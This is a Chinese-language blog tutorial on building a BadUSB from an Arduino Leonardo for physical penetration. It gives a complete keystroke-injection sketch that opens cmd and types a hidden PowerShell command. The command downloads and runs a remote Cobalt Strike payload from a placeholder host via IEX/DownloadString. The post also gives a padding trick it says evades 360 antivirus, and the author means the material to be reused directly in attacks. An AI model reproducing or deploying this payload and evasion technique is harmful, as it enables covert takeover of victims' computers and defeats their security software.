前言

之前看过不少badusb制作的文章，一直没有亲自动手尝试过，记录下自己动手制作badusb的过程，方便以后遇到攻击场景可以直接利用。

实验准备

首先需要一个badusb，本次使用的是leonardo_Arduino
Arduino工具，用于烧录badusb
公网cs服务器，执行powershell脚本，接收反弹的会话
win10物理机，模拟被攻击主机

制作过程

Arduino使用

制作过程非常简单，首先下载Arduino开发者工具—用来向leonardo烧录程序的软件。
下载地址https://www.arduino.cn/thread-5838-1-1.html
安装成功后，打开工具，选择开发版和编程器为："Arduino leonardo"和"USBasp"，插入badusb，选择对应的端口连接。

实现目的：自动输入远程下载执行cs上线的ps代码，从而控制目标机器。
首先对badusb制作的按键代码进行学习，badusb可以模拟键盘输入和鼠标点击。
具体按键设置:

delay(5000);//延时毫秒
Keyboard.begin();     //开始键盘通讯
Keyboard.end();     //结束键盘通讯
Keyboard.press();     //按下键盘按键    如果是非特殊按键如 数字、字母按键用单引号括起来
Keyboard.release();     //释放键盘按键
Keyboard.println("");     //输入字符串使用双引号括起来 
Mouse.begin();//鼠标事件开始
Mouse.click();//鼠标单击
Mouse.end();//鼠标事件结束
Mouse.move();//鼠标移动(x,y)
Mouse.press();//鼠标按下
Mouse.release();//鼠标松开
Mouse.isPressed();//   
KEY_LEFT_CTRL
KEY_LEFT_SHIFT
KEY_LEFT_ALT
KEY_LEFT_GUI    //win键
KEY_RIGHT_CTRL
KEY_RIGHT_SHIFT
KEY_RIGHT_ALT
KEY_RIGHT_GUI
KEY_UP_ARROW
KEY_DOWN_ARROW
KEY_LEFT_ARROW
KEY_RIGHT_ARROW
KEY_BACKSPACE
KEY_TAB
KEY_RETURN//回车键
KEY_ESC
KEY_INSERT
KEY_DELETE
KEY_PAGE_UP
KEY_PAGE_DOWN
KEY_HOME
KEY_END
KEY_CAPS_LOCK
KEY_F1
KEY_F2
KEY_F3
KEY_F4
KEY_F5
KEY_F6
KEY_F7
KEY_F8
KEY_F9
KEY_F10
KEY_F11
KEY_F12

编写利用代码

以下为我编写的利用代码。

#include<Keyboard.h> //包含键盘模块头文件
void setup(){ //初始化
Keyboard.begin();//开始键盘通信
delay(3000);//延时3000毫秒，
Keyboard.press(KEY_LEFT_GUI);//按下徽标键 也就是win键 
Keyboard.press('r');//按下r键 CMD
delay(500); 
Keyboard.release(KEY_LEFT_GUI);//松掉win键 
Keyboard.release('r');//松掉r键 
delay(500); 
Keyboard.println("cmd ");
Keyboard.press(KEY_RETURN);  //按下回车键
Keyboard.release(KEY_RETURN); //释放回车键
delay(500); 
Keyboard.press(KEY_CAPS_LOCK);  //大小写切换
Keyboard.release(KEY_CAPS_LOCK); 
delay(500);
Keyboard.println("powershell.exe  -W   Normal  -W   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w  hidden  IEX(New-Object Net.WebClient).DownloadString('http://x.x.x.x/a') ");
delay(500); 
Keyboard.press(KEY_RETURN);  //按下回车键
Keyboard.release(KEY_RETURN); //释放回车键
delay(500);
Keyboard.press(KEY_CAPS_LOCK);  //大小写切换
Keyboard.release(KEY_CAPS_LOCK); //释放大写
delay(500);
Keyboard.end();//结束键盘通讯 
} 
void loop()
{ 

}

在代码实现的过程中主要发现2个坑点。
1、目标机器默认中文输入法的问题
2、在某些系统运行需要安装驱动

目标机器默认中文输入法

在实际利用情况下，如果目标默认使用的是中文输入法，当插入badusb模拟键盘输入时，会影响正常输入。
比如输入-w hidden,实际输出为-我hidden

尝试了2种解决方法：
1、模拟KEY_LEFT_SHIFT按键把中文输出法切换为英文
2、模拟KEY_CAPS_LOCK按键输出大写字符
第一种解决方法，模拟KEY_LEFT_SHIFT按键，在目标为中文输入法时，可以正常切换为英文，正常输出，但一旦对方默认为英文输入法，反而画蛇添足。
第二种解决方法，模拟KEY_CAPS_LOCK按键，在默认使用中英文输入法时都适用，唯一不适应的情况是对方默认使用中文输入法且开启了大写输入。

免杀处理

普通的powershell命令会被360检测到。

之前公布出的powershell免杀方法基本都失效了，本次在之前的方法上进行升级，可完美绕过360全家桶。

powershell.exe  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w   Normal  -w  hidden  IEX(New-Object Net.WebClient).DownloadString('http://x.x.x.x/a')

键盘操作流程是，首先按下win+r键，由于免杀后的powershell代码超过运行的长度限制，因此需要先调用cmd，然后在cmd命令行中运行powershell命令。

把代码编译烧录到badusb。

成功bypass360，这里有一个坑点需要注意！！！
由于为了解决中文输入法的问题，badusb模拟了KEY_CAPS_LOCK按键转化为大写，因此写入的powershell远程下载地址需要与实际的相反。如下:

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/shell'))
变为
powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/SHELL'))

cs上线成功。

总结

本次对物理渗透中的badusb制作进行了学习，成功绕过360运行badusb 执行powershell代码，badusb以及免杀powershell能做的事情还有很多～

参考链接

https://www.cnblogs.com/enderzhou/p/7058570.html
https://cloud.tencent.com/developer/article/1472490

物理渗透-badusb制作